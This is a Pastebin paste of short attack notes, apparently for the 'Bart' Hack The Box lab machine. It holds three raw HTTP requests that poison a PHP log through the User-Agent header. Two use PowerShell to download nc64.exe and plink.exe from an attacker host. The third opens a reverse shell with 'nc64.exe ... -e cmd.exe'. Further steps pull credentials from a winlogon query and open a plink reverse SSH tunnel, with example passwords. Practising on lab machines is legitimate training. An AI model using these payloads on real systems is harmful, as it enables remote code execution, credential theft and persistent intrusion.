Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- get nc64 to the box. and then execute that. Then upload plink.exe to the box to create a tunnel after.
- I guess you are fine with this. Just make sure you upload 64.exe
- GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
- Host: internal-01.bart.htb
- User-Agent: <?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.235:8000/nc64.exe','nc64.exe')\""); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
- Connection: close
- Upgrade-Insecure-Requests: 1
- GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
- Host: internal-01.bart.htb
- User-Agent: <?php exec("nc64.exe 10.10.14.235P 9999 -e cmd.exe"); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
- Connection: close
- Upgrade-Insecure-Requests: 1
- GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
- Host: internal-01.bart.htb
- User-Agent: <?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.235:8000/plink.exe','plink.exe')\""); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
- Connection: close
- Upgrade-Insecure-Requests: 1
- then inside bart nc64.exe on the winlogon query
- get the creds
- then use plink to create a tunnel. SSh must be running on KALI
- echo y|plink.exe -l root -pw passwordssh ipkali -R kaliport:127.0.0.1:windowsport
- Example:
- echo y|plink.exe -l root -pw mypassword 10.10.15.88 -R 5555:127.0.0.1:445
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement